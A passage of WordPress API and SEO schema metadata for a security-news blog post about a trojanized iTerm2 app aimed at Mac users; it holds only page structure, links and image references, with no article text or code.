Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"datePublished\":\"2021-09-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"width\":1376,\"height\":968},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-anal
yst-threats-analyst\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=43144"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43144\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/43145"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=43144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=43144"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=43144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}